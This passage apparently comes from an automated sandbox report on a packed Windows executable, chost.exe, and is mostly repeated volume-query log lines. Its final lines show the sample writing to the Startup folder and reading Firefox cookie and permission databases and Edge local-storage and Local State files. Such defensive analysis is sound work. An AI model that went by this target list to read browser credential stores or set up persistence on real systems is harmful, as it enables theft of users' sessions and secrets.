                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\select.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
